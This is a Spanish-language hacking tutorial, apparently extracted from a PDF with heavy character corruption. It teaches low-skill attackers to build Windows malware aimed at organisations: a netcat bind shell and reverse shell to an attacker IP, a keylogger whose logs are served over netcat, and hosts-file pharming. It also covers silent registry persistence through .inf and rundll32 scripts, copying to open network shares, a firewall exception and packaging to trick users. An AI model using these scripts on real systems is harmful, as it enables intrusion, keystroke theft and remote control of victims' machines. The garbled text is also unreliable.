Hacking Within Nails

http://hackstudio.
net
nkt@hackstudio.net
------------------------------------------------------------------
HACKING WITHIN NAILS
hackeando con as u!as"
Part 1. The Malware Plague
------------------------------------------------------------------
... si nos toc hacerlo con las uas, pues !! afilmonos las
uas !! ... !! que parezcan verdaderas garras !!! ...
nkt
------------------------------------------------------------------
Int#o.
------------------------------------------------------------------
Este documento presenta una perspectiva sobre diferentes tcnicas
"aparentemente de bajo nivel tcnico", con las cuales "cualquier
individuo inquieto" puede desarrollar estrategias efectivas de
ataques informticos (con una alta capacidad de dao). Se pretende
detallar cmo, sin ser ingeniero, sin ser el "super!"ac#er", sin
ser el e$perto programador, ni nada por el estilo, una persona
"ostil puede lograr e$celentes resultados de intrusin en empresas
% organi&aciones "t'picas colombianas".
En esta ocasin se estudiar una recopilacin de las principales
tcnicas en el desarrollo (bsico) de mal*are.
------------------------------------------------------------------
The $a%a#e &ack'#ound
Antecedentes.
------------------------------------------------------------------
+omo toda aplicacin o soft*are (programa tambin ser un trmino
usado en este conte$to), se requiere principalmente de un arc"ivo
para ejecutar el cdigo malicioso. Sin embargo, e$isten
diferencias conceptuales reconocidas por los e$pertos en seguridad
informtica que establecen una cierta clasificacin del mal*are,
que define nuestro dominio de conocimiento. Estas diferencias, se
refieren al comportamiento del mal*are una ve& este ataca un
sistema informtico.
,e acuerdo a un documento publicado en la +S-./ de +olombia (el
equipo de respuesta a incidentes de seguridad informtica) en
"ttp011***.udistrital.edu.co1comunidad1grupos1arquisoft1colcsirt1,
ocumentos."tml (escrito por 2uan +arlos 3albuena), una ta$onom'a
(clasificacin) para especificar mal*are debe cumplir ciertas
caracter'sticas de la forma ms ptima posible0
http://hackstudio.net
nkt@hackstudio.net
()* La ta+ono$,a de&e se# co$peta. Es decir todos los elementos
que se clasifican deben ser abordados dentro de alguna de las
categor'as de la ta$onom'a.
(-* La ta+ono$,a de&e se# $utua$ente e+cu.ente. Es decir, el
elemento que se clasifica debe pertenecer a una % solo a una
categor'a. 4o puede ser dos al mismo tiempo, aunque en el mundo
real se "abla de virus con caracter'sticas de gusanos o gusanos
con caracter'sticas de tro%ano, vamos "acer la diferenciacin de
este tipo de aplicaciones de acuerdo a una clasificacin
consistente con el dominio del conocimiento en el rea de mal*are.
(/* 0epeti&e. Es decir, que al aplicar las mismas reglas
ta$onmicas sobre un conjunto de datos, los resultados deben ser
los mismos independientemente del n5mero de veces que se analice
el problema. Si la clasificacin ta$onmica es consistente, no
deber'a "aber variacin a aplicar las mismas reglas de
clasificacin en las mismas condiciones de evaluacin.
+on lo mencionado anteriormente se trabajar sobre el mal*are
reconocido por las autoridades en seguridad informtica (4/+!
-S61-E+78899). Se especificar su caracter'stica principal % la
diferencia de las dems categor'as ta$onmicas.
()* 1i#us in2o#$3ticos. Se reproducen infectando otros arc"ivos
(por lo general ejecutables, macros, multimedia, etc.)
(-* Gusanos in2o#$3ticos. Se reproducen usando servicios de
-nternet (p.e. el correo electrnico).
(/* T#o.anos. :plicaciones que aparentan "acer una cosa, pero
"acen otra.
(4* 5ue#tas T#ase#as. ;ermiten cone$iones e$ternas de posibles
intrusos.
(6* Spa$. +orreos de circulacin masiva, generalmente con el fin
de recolectar listas de correos para la posterior distribucin del
verdadero mal*are (p.e. un virus o un gusano).
(7* Sp.%a#e. Soft*are esp'a que monitorea las actividades de los
usuarios (p.e. #e%loggers, etc)
(8* 0ootkits. .eali&an varias actividades sospec"osas, pero su
principal objetivo es ocultarse de los mtodos de deteccin.
(9* 5hishin'. +orreos de circulacin masiva que contienen pginas
de acceso suplantadas para el fraude informtico.
nkt@hackstudio.net
(:* ;iae#s. :plicaciones que sirven para el marcado internacional
con el fin de ofrecer (servicios gratuitos) (sobre todo
pornograf'a), pero que (reali&an la respectiva tarificacin) a la
empresa -S;. 6bviamente el -S;, le tarificar al usuario como
llamada la cone$in reali&ada.
()<* ad%a#e. Soft*are con contenido comercial por lo general de
carcter publicitario.
E$isten obviamente una serie de caracter'sticas comunes %
compartidas entre las diferentes categor'as, % de "ec"o, el
pro%ecto de mal*are a desarrollar incluir varias de las tcnicas
incluidos para algunas de las categor'as presentadas
anteriormente.
------------------------------------------------------------------
=a%a#e hackin'
5#incipios de dise!o
------------------------------------------------------------------
Este pro%ecto de desarrollo de mal*are incluir los siguientes
targets.
()* pa.oad o ca#'a dest#ucti>a. :nali&aremos el uso bsico de un
bac#door para establecer una cone$in en un puerto de cone$in
tipo /+;. ;or otra parte anali&aremos el uso de un sp%*are para
monitorear las actividades del usuario v'ctima, tipo #e%logger.
(-* &ootLoade#. violacin del registro de configuraciones de
*indo*s con el fin de garanti&ar el arranque del mal*are.
(/* $ecanis$o de dist#i&uci?n. ,e tal forma que el mal*are se
disperse al interior de una infraestructura de red tipo
<:41Et"ernet
(4* e>asi?n &3sica" de 2i#e%a. +on el fin de evitar la
deteccin al ejecutar comportamientos sospec"osos
(6* e$pa@ueta$iento . sc#iptin'. +reacin de ejecutables %
configuracin de scripts de funcionamiento
(7* t#o.aniAaci?n. +u%o objetivo es (involucrar a la v'ctima) en
el proceso de intrusin
5.;. e$isten un abanico de tcnicas alternativas (% de alto nivel
tcnico) como p.e. buffer!"eap!stac# overflo*ing, s"ellcoding,
process jumping, antivirus attac#, bugs e$ploiting, dll=s and
e$e=s injection, etc. Estas tcnicas se conocen %a como el arte de
la e$plotacin % la intrusin (the a#t o2 int#usion and
nkt@hackstudio.net
e+poitation".) % requieren una alta capacidad de programacin. El
propsito de este pro%ecto es o'#a# os $is$os #esutados Bo
si$ia#esC sin tene# @ue acudi# a a co$peDidad @ue estas
tEcnicas #e@uie#en". En pocas palabras vamos a ("ac#ear con las
uas) (hacking within nails).
------------------------------------------------------------------
=a%a#e ;e>eop$ent
;esa##oo
------------------------------------------------------------------
()* pa.oad.
+onsiste en la aplicacin que realmente "ace dao al sistema. Esto
se conoce como carga destructiva. En primera instancia
utili&aremos un bac#door. En realidad el bac#door (puerta trasera)
solo consiste en un ejecutable que abra un puerto en estado de
escuc"a (<istening) % nos permita establecer una cone$in e$terna.
E$isten varios mu% reconocidos, tipo bo, netbus, etc. /odos ellos
requieren fase de instalacin % configuracin, por lo que no nos
permite incluirlos de forma sencilla en la fase de scripting.
Se utili&ar en su lugar el reconocido netcat (a.#.a. nc, la
navaja sui&a), una de las mejores utilidades para cone$iones
/+;1-;. El comando de ejecucin que nos permite ejecutar nc modo
de escuc"a1<istening (-L) para lan&ar (-e c$d.e+e) una consola de
comandos al conectarnos al puerto (-p 777) establecido es
sencillo0
F nc GL Gd Gp 777 Ge c$d.e+e
la opcin Gd le dice a nc que corra de forma oculta (sin levantar
una consola).
Si verificamos el estado de red del sistema a travs de la consola
(basta con ejecutar el comando netstat), podemos verificar que se
abre el puerto establecido para escuc"ar por cone$iones entrantes.
;or el momento, como pa%load, es suficiente. Sin embargo, el
problema actual es que desde "ace un par de aos, algunos
nkt@hackstudio.net
antivirus "an decidido incluir nc en sus bases de firmas. Esto
significa que es posible que en algunos "osts v'ctimas el
antivirus emita una alarma.
:lternativas0
>7? se podr'a tomar el cdigo fuente de netcat % recompilarlo
tratando de cambiar algunas opciones con el fin de que la firma no
sea reconocida por el antivirus.
>@? se podr'a utili&ar un *rapper especial que encripte el cdigo
binario de netcat con el fin de que el antivirus no pueda reali&ar
su anlisis de forma correcta.
>A? la mejor. ,esarrolla tu propio cdigo. 4uestro amigo e
investigador en seguridad, Badete (a.#.a. 2uan E. ;ecantet) "a
desarrollado una aplicacin ((<u&%Cer)), para cone$iones tcp que
abre un soc#et a la escuc"a en el puerto DDDD, establece
cone$iones con un cliente, recibe solicitudes % procesa comandos.
El cdigo 5til de esta aplicacin no supera las EF l'neas de
cdigo en lenguaje c, con la ventaja de que por ser (cdigo
limpio) (cdigo que no "a sido testeado anteriormente por los
sistemas de antivirus convencionales) no forma parte de la ma%or'a
de las bases de firmas v'ricas. Celicitaciones B,/ GGG.
;.,. Badete reside en :rgentina, Se puede contactar en
#adete.uni$Hgmail.com, trabaja para un grupo de investigacin en
"ac#ing. : continuacin se presenta un previe* del sencillo cdigo
con el que se puede obtener mu% buenos resultados en el desarrollo
de un bac#door (<u&%Cer).
nkt@hackstudio.net
+ualquiera de las aplicaciones anteriores simplemente cumplen con
las funciones de bac#door cu%o objetivo es esencialmente la
ejecucin de comandos de s"ell en la mquina v'ctima.
:"ora, talve& ser'a interesante aadir al pa%load del mal*are
alg5n tipo de funcin esp'a (sp%*are). ;ara ello incluiremos el
uso de un #e%logger desarrollado por el grupo de investigacin en
seguridad informtica de la Iniversidad del +auca
("ttp011gseguridad.unicauca.edu.co). El #e%logger, desarrollado
por .on% :rana (investigador % desarrollador) % Siler :mador
,onado (coordinador del grupo de investigacin) genera un arc"ivo
de te$to plano que es enviado a una cuenta de correo. /ambin es
(cdigo limpio), por lo cual no es detectado por los antivirus. El
inconveniente es que el #e%logger est configurado para enviar el
arc"ivo de te$to con los datos de las pulsaciones de tecla a una
cuenta de correo electrnico que se pasa por argumento en la l'nea
de comandos. : continuacin se presenta un overvie* del cdigo
fuente del #e%logger.
El servidor de correo que permite el reenv'o del correo debe estar
con su configuracin por defecto (que efectivamente es defectuosa)
para permitir el rela%. :s' que para el uso dentro de nuestro
pro%ecto de mal*are no utili&aremos la funcin de env'o al correo
electrnico. ;or el contrario, utili&aremos el mismo netcat para
que al recibir una cone$in, me permita descargar el arc"ivo.
;oner a funcionar el #e%logger es sencillo.
F ke.o''e# int#uso@de>iho$e.co$
Esta funcin genera un :rc"ivo que se llama lg;".log, donde se
almacenan las pulsaciones de teclado. :s', lo 5nico que se
requerir'a ser'a cargar arc"ivo de datos en un flujo para ser
transmitido por netcat. Esto es sencillo0
F nc GL Gp 776 H '5h.o'
Jasta este momento est completa la carga destructiva del mal*are.
Se pueden "acer muc"as ms cosas. <as opciones son innumerables %
%a dependen de la capacidad % creatividad del intruso. Ina de las
ms atractivas (% que se "a impuesto de moda), es la tcnica
llamada p"arming, en la cual se suplantan direcciones -; por I.<Ks
validos en el arc"ivo de configuracin de "osts (a.#.a.
nkt@hackstudio.net
LS%stem.ootLMs%stemA@MdriversMetcM"osts, en el caso de esta
mquina donde se est editando este documento0
+0MN-44/MS%stemA@MdriversMetcM"osts) para la navegacin *eb. Esto
es de lo ms sencillo de reali&ar, %a que simplemente se requiere
reempla&ar un arc"ivo de te$to. ;or mostrar un ejemplo, en el
siguiente previe* asignamos una direccin de la mquina atacante
(79@.7OP.7.D) que tiene un servidor *eb con una rplica de la
pgina suplantada.
El usuario ingenuo, simplemente introduce sus datos en los
formularios, el atacante guarda los datos recolectados en
variables en su (base de datos) % redirecciona a la verdadera
pgina de error de la entidad suplantada. <isto. El usuario
simplemente "a de creer que introdujo mal los datos en sus
formularios. Este es el famoso p"is"ing (con muc"os adeptos por
estos d'as). ;or efectos pedaggicos del desarrollo de este
pro%ecto, se cambiar el nombre de los ejecutables as'0 nc.e$e se
reempla&ar por *inA@.e$e, % #e%logger.e$e se reempla&ar por
runA@dl.e$e (solo por utili&ar un conjunto de nombres que
dificulten el proceso de identificacin del mal*are).
(-* &ootLoade#. >ioaci?n de #e'ist#o de con2i'u#aciones
BHackin' 0e'ist#."C.
E$isten varias formas de establecer un punto de arranque para
cualquier mal*are. Estos puntos de arranque se conocen como :SE;=s
(:utostart E$tensibilit% ;oints) % se presenta una buena
referencia en0
"ttp011***.pestpatrol.com1pestinfo1autostartingpests.asp.
: continuacin se referencian algunas0
(-* ;i#ecto#io de Inicio
L:<<ISE.S;.6C-<ELMQen5 -nicioM;rogramasM-nicio
;ara una instalacin t'pica en espaol, un ejemplo podr'a ser0
+0M,ocuments and SettingsM:ll IsersMQen5 -nicioM;rogramasM-nicio
nkt@hackstudio.net
(-* Int#adas en e a#chi>o %in.ini Bc:J%indo%sJ%in.iniC
<a sinta$is de las entradas es del tipo0
------------------------------------------------------------------
>*indo*s?
runRc0M*indo*sMs%stemA@Mmal*are.e$e
loadRan%t"ing
------------------------------------------------------------------
(-* Int#adas en e a#chi>o s.ste$.ini Bc:J%indo%sJs.ste$.iniC
<a sinta$is de las entradas es del tipo0
------------------------------------------------------------------
>boot?
s"ellRe$plorer.e$e c0M*indo*sMs%stemA@Mmal*are.e$e
------------------------------------------------------------------
(-* GKindous" 0e'ist#.
El registro es el rea de campo de trabajo de la ma%or'a del
mal*are en la actualidad. Se utili&ar en este pro%ecto para
garanti&ar el arranque del mal*are junto con el sistema operativo.
<as claves principales para reali&ar el boot del mal*are son (ver
SE</SE., <enn%. =a%a#e: Li'htin' $aicious code. @FFA)0
------------------------------------------------------------------
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.unServices6nce
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.unServices
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un6nce
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un6nceE$
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*s 4/M+urrent3ersionMNinlogonMIserinit
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionMS"ellService6bject,ela%<oad
JBETU<6+:<UQ:+J-4EMS6C/N:.EM;oliciesMQicrosoftMNindo*sMS%stemMScripts
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM;oliciesME$plorerM.un
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.unServices6nce
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.unServices
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un6nce
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un6nceE$
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM;oliciesME$plorerM.un
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*s 4/M+urrent3ersionMNindo*sM.un
JBETU+I..E4/UISE.MS6C/N:.EMQicrosoftMNindo*s 4/M+urrent3ersionMNindo*sM<oad
JBETU+I..E4/UISE.MS6C/N:.EM;oliciesMQicrosoftMNindo*sMS%stemMScripts
JBETU+<:SSESU.66/ME$efilesMS"ellM6penM+ommand
------------------------------------------------------------------
E$isten otro tipo de claves que permiten for&ar la ejecucin de un
arc"ivo dada una solicitud de ejecucin de una aplicacin.
------------------------------------------------------------------
>JBETU+<:SSESU.66/Me$efileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU+<:SSESU.66/McomfileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU+<:SSESU.66/MbatfileMs"ellMopenMcommand? R"M"L7M" LV"
nkt@hackstudio.net
>JBETU+<:SSESU.66/M"tafileMS"ellM6penM+ommand? R"M"L7M" LV"
>JBETU+<:SSESU.66/MpiffileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU<6+:<UQ:+J-4EMSoft*areM+<:SSESMbatfileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU<6+:<UQ:+J-4EMSoft*areM+<:SSESMcomfileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU<6+:<UQ:+J-4EMSoft*areM+<:SSESMe$efileMs"ellMopenMcommand? R"M"L7M" LV"
>JBETU<6+:<UQ:+J-4EMSoft*areM+<:SSESM"tafileMS"ellM6penM+ommand? R"M"L7M" LV"
>JBETU<6+:<UQ:+J-4EMSoft*areM+<:SSESMpiffileMs"ellMopenMcommand? R"M"L7M" LV"
------------------------------------------------------------------
In ejemplo (del uso e$agerado) de este tipo de claves es el
mal*are (soundmi$.e$e), el cual ante cada solicitud de ejecucin
de (cualquier cosa) volv'a % cargaba su propio ejecutable. E$isten
otras claves espec'ficas, las cuales (como %a se mencion
anteriormente), pueden ser consultadas en0
"ttp011***.pestpatrol.com1pestinfo1autostartingpests.asp.
6tra forma (algo ms ortodo$a, aunque menos visible), es crear el
tro%ano llamado e$plorer.e$e % ubicarlo en el disco +0M, lo cual
"ace que se cargue automticamente el tro%ano (que impl'citamente
puede llamar al verdadero e$plorer.e$e en
+0M*indo*sMe$plorer.e$e).
E$isten muc"as diversas formas de establecer un punto de arranque
del mal*are, de tal manera que en fin, esto depender en alto
grado de la capacidad1creatividad del desarrollador del mal*are.
;.e. basta con crear un tro%ano que al ejecutarse, revise si est
activo el ie$plorer.e$e. ,e ser as', que lo baje (elimine el
proceso), que copie una versin del ie$plorer.e$e (tro%ani&ada) %
vuelva a levantar el proceso. ,e esta manera, cada ve& que el
usuario decida (navegar en internet), ejecutar impl'citamente el
tro%ano (que contiene el pa%load), sin tener que utili&ar ninguna
de las estrategias de boot<oader desde el registro de
configuraciones de *indo*s. ,e cualquier forma, por ser este un
pro%ecto didctico % para reali&ar la violacin del registro, se
utili&ar un valor en una clave t'pica, con el fin de tratar de
simular el comportamiento t'pico de la ma%or'a de mal*are. <a
clave es run en JB<Q.
JBETU<6+:<UQ:+J-4EMS6C/N:.EMQicrosoftMNindo*sM+urrent3ersionM.un
nkt@hackstudio.net
Escribiremos a continuacin el script necesario para instalar un
valor de inicio del mal*are en dic"a clave. E$isten varias formas
de reali&ar este script, aunque por lo general el uso de comandos
tipo (reg) despliegan un aviso solicitando al usuario de la
mquina la confirmacin de la instalacin en el registro. En lugar
de esto, podemos "acer un script en un arc"ivo .inf para que se
instale de forma silenciosa sin pedir la confirmacin. :
continuacin se presenta el arc"ivo >install.inf?
------------------------------------------------------------------
>3ersion?
SignatureR"W+"icagoW"
;roviderRn#t
>,efault-nstall?
:dd.egRn#t
>n#t?
JB<Q, Soft*areMQicrosoftMNindo*sM+urrent3ersionM.un,,,*inA@.e$e !< !d !p
OOO !e cmd.e$e
------------------------------------------------------------------
En la pgina oficial de microsoft e$iste una gu'a completa para
desarrollar arc"ivos de instalacin1desinstalacin bajo directivas
de arc"ivos .inf. :"ora, el problema consiste en que para instalar
un arc"ivo .inf, desde el e$plorador de *indo*s se necesita dar
clic# derec"o % seleccionar la opcin instalar en el men5
conte$tual. 6bviamente que no podemos esperar que sea un usuario
que "aga esto de forma voluntaria. E$iste un comando que permite
reali&ar esta instalacin de forma silenciosa. El script se
describe a continuacin (arc"ivo >install.bat?)0
------------------------------------------------------------------
rundllA@ setupapi,-nstallJinfSection ,efault-nstall 7A@ .Minstall.inf
------------------------------------------------------------------
Ina ve& que se ejecute el anterior script (lo cual si puede
automati&arse de forma silenciosa), se instala el script contenido
en el arc"ivo .inf instalado (install.inf).
<o descrito anteriormente es suficiente para llevar a cabo la
operacin de la violacin del registro de configuraciones. +omo %a
se mencion, e$isten innumerables puntos de carga del mal*are con
sus claves espec'ficas de registro que pueden aprovec"arse de la
misma manera e$plicada anteriormente. In script para instalar la
clave (arc"ivo .inf) % un script para reali&ar la instalacin de
forma silenciosa.
nkt@hackstudio.net
(/* $ecanis$o de dist#i&uci?n.
E$isten varias alternativas. Ina de las ms tcnicas, es la
deteccin de un bug o fallo natural del sistema (tipo lsass, que
di el canal de difusin al famoso sasser, un gusano que
definitivamente dej su marca en la "istoria). ;or lo general, una
actividad t'pica de un gusano, es la b5squeda o e$ploracin de la
red en b5squeda de este tipo de fallas, % al encontrar un conjunto
de equipos vulnerables en una red, proceder a ejecutar un e$ploit
que instale el gusano en cada equipo vulnerable. El nivel tcnico
requerido desde el punto de vista de la programacin es alto. 6tra
tcnica bastante utili&ada, es la b5squeda de direcciones de
correo electrnico. Esto puede "acerse atacando directamente las
libretas de direcciones de aplicaciones como outloo# (de "ec"o,
este tipo de b5squedas es t'pica). /ambin se requieren
aplicaciones especiales que realicen esta tare de forma
espec'fica. 6tra forma, es bombardear directamente el servidor de
correo electrnico de la organi&acin en busca de conjuntos de
usuarios. p.e. +uentas tipo allusersHcompan%.com, que al recibir
un correo, lo redireccionan a todas las cuentas de correo de la
organi&acin. /odas estas tcnicas mencionadas anteriormente
pretenden lograr un mecanismo de distribucin del mal*are, % son
frecuentemente utili&adas % requieren una gran capacidad de
programacin.
En la propuesta de este pro%ecto procederemos a utili&ar un modelo
muc"o ms sencillo para la distribucin de un mal*are al interior
de una infraestructura <:41Et"ernet. Es el abuso de los recursos
compartidos en una red t'pica ms!*indo*s. 3ale la pena mencionar
que en muc"as redes corporativas, por necesidad de acceso a
arc"ivos % falta de conciencia en el rea de seguridad de la
informacin, suele mantenerse de forma indefinida e irreglamentada
un conjunto de recursos compartidos sin ning5n tipo de
restriccin. Esto tambin es altamente e$plotable, % generalmente
es una de las acciones t'picas de un gusano. En este pro%ecto se
aprovec"ar la caracter'stica t'pica de redes *indo*s X; en la
cual e$iste una carpeta t'pica para compartir recursos
((,ocumentos +ompartidos)). <a configuracin t'pica tambin es el
acceso a dic"a carpeta con privilegios de lectura1escritura % sin
ning5n tipo de autenticacin. Siendo as', no resta, sino
(scriptar) nuestras instrucciones para que se copie el cuerpo del
mal*are en las carpetas que encuentre compartidas (de forma
vulnerable) (en este caso, la t'pica carpeta que parece que no
puede faltar en ning5n equipo ... Qusica, Yraro noZZ). El cdigo
del script se incluir en el arc"ivo >dist.bat?
------------------------------------------------------------------
C6. 1C (to#ensR7) Li -4 (dirs.t$t) do $cop% mal*are.e$e MMLiMQusica @[nul
------------------------------------------------------------------
nkt@hackstudio.net
donde debe e$istir un arc"ivo >dirs.t$t? que contenga una lista de
direcciones -; a testear.
------------------------------------------------------------------
79@.7OP.7.@
79@.7OP.7.A
79@.7OP.7.D
79@.7OP.7.E
79@.7OP.7.O
79@.7OP.7.8
79@.7OP.7.P
79@.7OP.7.9
...
------------------------------------------------------------------
6bviamente, en este caso, el desarrollador del mal*are, tiene
conocimiento de el rango de direcciones -; que desea infectar\ sin
embargo esto no omite que un script ms elaborado, realice las
b5squedas de direcciones -; automticamente. <o t'pico ser'a
utili&ar el mismo bucle anterior % en lugar del $cop%, utili&ar
comandos net, p.e.
------------------------------------------------------------------
[ net use V MM-;3ictimasM-;+W
------------------------------------------------------------------
;or otra parte, "erramientas especiali&adas en e$ploracin de
redes como netvie*$ (de 2esper <auritsen,
"ttp011***.ibt.#u.d#1jesper14/tools), nete (de Sir ,%stic de (/"e
+ult of ,ead +o*), a.#.a. (El culto de la vaca muerta), famoso
grupo en la "istoria del "ac#ing), enum
("ttp011***.bindvie*.com1support1.a&or1Itilities) % 4:/ (parte del
antiguo <egion), permiten reali&ar scripts ms complejos que
e$ploran mquinas a nivel de red para locali&ar recursos
compartidos, listas de usuarios, etc. ;or (pedagog'a) en este
pro%ecto nos limitaremos al script (primitivo) visto anteriormente
que cumple con la funcionalidad que requerimos.
(4* e>asi?n &3sica" de 2i#e%a.
En este punto, %a "emos obtenido prcticamente toda la
funcionalidad de nuestro pro%ecto de mal*are. :"ora, (necesitamos
proteger) nuestra actividad intrusiva. El fire*all talve& sea la
principal aplicacin a evitar (aparte de los -,S, que para el
prototipo "abitual de una infraestructura <:4 en nuestras
empresas, suele ser considerado (una e$ageracin) en costos %
esfuer&os ... Yde dnde sale que todos los ataques informticos
solo le suceden a microsoft, el C]-, la 4:S: % el pentgonoZZ).
]ien, en un escenario t'pico a nivel de intranet, generalmente
nkt@hackstudio.net
(nos conformamos) con ver el icono de (fire*all activo) en nuestra
s%stra%. Se podr'a utili&ar aplicaciones tipo (microc"ip) (un
ejecutable que (lastimosamente) %a es detectado por antivirus como
#aspers#%) que al ejecutarse baja automticamente el fire*all de
*indo*s.
Sin embargo (% como cosa rara en los entornos ms!*in), la
configuracin del fire*all tambin est delegada al registro de
configuraciones.
Esto implica que (basta un simple script) para modificar la
configuracin del fire*all % evitar que apare&ca el aviso de
bloqueo de cone$in. El script es sencillo % se presenta a
continuacin (arc"ivo >f*.inf?)0
------------------------------------------------------------------
>3ersion?
SignatureR"W+"icagoW"
;roviderRn#t
>,efault-nstall?
:dd.egRf*
>f*?
JB<Q,
STS/EQM+ontrolSetFF7MServicesMS"ared:ccessM;arametersMCire*all;olic%MStan
dard;rofileM^loball%6pen;ortsM<ist,OOO0/+;,,OOO0/+;0V0Enabled0*inA@.e$e
------------------------------------------------------------------
6bviamente, tambin para instalar este arc"ivo >f*.inf? de forma
silenciosa, requerimos un arc"ivo por lotes >f*.bat?0
------------------------------------------------------------------
rundllA@ setupapi,-nstallJinfSection ,efault-nstall 7A@ .Mf*.inf
------------------------------------------------------------------
nkt@hackstudio.net
: nivel de intranet ... GGG ES6 ES /6,6 GGG. al violar el
registro, le decimos que la aplicacin *inA@.e$e (nuestro
bac#door) va a abrir el puerto (OOO) % que simplemente el fire*all
de *indo*s (debe quedarse callado). Solo basta prestarle atencin
a que este script debe ejecutarse antes de intentar poner el
bac#door en escuc"a por cone$iones.
;ara complementar este pro%ecto, en caso de requerir aprovec"ar la
funcionalidad de nuestro mal*are de forma e$terna a la intranet,
se necesitar'a evadir el fire*all de red (generalmente un fire*all
corporativo que reali&a funciones 4:/). ]asta con utili&ar un
puerto com5n que (no suele ser filtrado), p.e. El puerto EA,
utili&ado para consultad ,4S, que se requiere para "acer la
resolucin de nombres en las consultas de internet. Entonces,
sencillamente podr'amos proceder a "acer una operacin (delicada)\
se conoce como callbac#. En lugar de ser la mquina v'ctima la que
permanece en estado <istening (!< para netcat), ponemos en escuc"a
la mquina atacante, % configuramos nuestro bac#door para que sea
la v'ctima la que se conecte (% nos env'e una ("ermosa consola)) a
la mquina atacante. Se requerir'a entonces que dispongamos de una
direccin -; real, pues el bac#door necesita (saber con quin se
conecta). Si la cone$in se establece a travs de un puerto no
filtrado por el fire*all de red, pues, sencillamente GGG T:
ES/:._: /6,6 JE+J6 GGGG.
: continuacin se muestran los scripts necesarios para reali&ar un
callbac# desde nuestro bac#door (tomaremos como mquina atacante
la 79@.7OP.7.D, % en una mquina virtual vm*are, emularemos la
mquina v'ctima con -; 79@.7OP.7.9).
En la mquina atacante0
------------------------------------------------------------------
[ nc !< !p OOO !v
------------------------------------------------------------------
nkt@hackstudio.net
observemos el previe*
En la mquina v'ctima, el bac#door debe estar configurado para
conectarse con el puerto disponible en la mquina atacante (en el
ejemplo se usa el OOO, aunque %a se mencion que para efectos de
reali&ar la evasin de fire*all, deber'a utili&arse un puerto no
filtrado, p.e. EA >dns?, PF >"ttp?, etc.).
El script requerido para "acer el callbac# desde el bac#door es0
------------------------------------------------------------------
[ nc !d -;:tacante puerto !e cmd.e$e
------------------------------------------------------------------
En este caso ser'a0
------------------------------------------------------------------
[ nc !d 79@.7OP.7.D OOO !e cmd.e$e
------------------------------------------------------------------
6bservemos el previe*, donde primero indagamos la direccin -; de
la v'ctima (solo por verificacin), % le pedimos a nuestro querido
netcat que por favor (me mande una consolita a la direccin del
atacante en el puerto donde el atacante est esperando que %o me
conecte).
nkt@hackstudio.net
:"ora, en la mquina atacante se puede observar como se establece
la cone$in con una (entrada) en la consola de la mquina v'ctima.
,onde podemos observar (en consola), que la direccin original
correspond'a a la mquina atacante, al recibir una cone$in se
nkt@hackstudio.net
lan&a la consola desde la v'ctima, % al volver a revisar la
direccin -; ... GG estamos en la mquina de la v'ctima GGG. T
pods ejecutar desde a"' (lo que quieras en la v'ctima)
<o ms importante de los ataques por callbac#s0 es el alcance de
direcciones no enrutables por ser internas (en el dominio de la
intranet) % estar (cubiertas) por el fire*all. Sin embargo, en
este punto es importante tener en cuenta qu tipo de ataque es el
que se reali&ar. Yquers controlar la mquinas de tu red desde el
interior de la intranetZZ, basta con el bac#door en estado de
escuc"a. 4o necesitas el callbac#. Yquers controlar las mquinas
desde fuera de la intranetZZ, si tens una mquina con -; esttica
e$terna, solo te falta configurar bien tus bac#doors para que
realicen un callbac# ... % <isto GGG no ms temores a los
fire*alls \;
Ypresenta alg5n problema las cone$iones por callbac#sZZ. ;ara un
mal*are que se distribu%e en una red0 S-. 4o ser'a apropiado que
todos los bac#doors intenten conectarse % mandar consolas al 5nico
puerto en el cual la mquina del atacante est esperando
conectarse con sus v'ctimas. :s' que es de prestarle atencin a0
7. configurar los bac#doors para que se conecten a distintos
puertos abiertos en la mquina atacante, @. abrir varios puertos
en escuc"a en la mquina atacante. ,e "ec"o, si el mal*are est
mu% distribuido, el ataque puede salir (contraproducente) ...
muc"os bac#doors tratando de conectarse con tu mquina te pueden
ocasionar una inesperada denegacin de servicio. En verdad se
deber'a refinar la especiali&acin de este tipo de ataques (%a
"abr oportunidad en otra publicacin, jeG ...).
5.;. No olvidar que aunque en el callback se utiliz directamente
netcat, en el proyecto del malware, se cambi el nombre del
ejecutable por win32.exe
(6* e$pa@ueta$iento . sc#iptin'.
<a funcionalidad de nuestro pro%ecto de mal*are %a est completa.
Sin embargo, en este momento solo tenemos un (reguero de scripts).
4ecesitamos empaquetar todo de tal forma que baste con un clic# de
un usuario desprevenido o ignorante o ambicioso, etc. (cualquier
actitud que atente contra la proteccin de la informacin), pues
en 5ltimas, las mas grandes vulnerabilidades de seguridad
informtica se encuentran en la mente de los usuarios.
.eali&aremos a continuacin el empaquetamiento de todos nuestros
scripts. 4i siquiera utili&aremos una (super!utilidad). ]asta con
ejecutar en *indo*s la utilidad (ie$press), o podemos acudir a
nuestro querido *inrar. +ualquiera de los dos sirve. ;or espacio
en este documento, mostraremos el funcionamiento tanto de ie$press
nkt@hackstudio.net
como de *inrar de forma grfica, % de forma te$tual se e$plicar
cual es el orden del empaquetamiento.
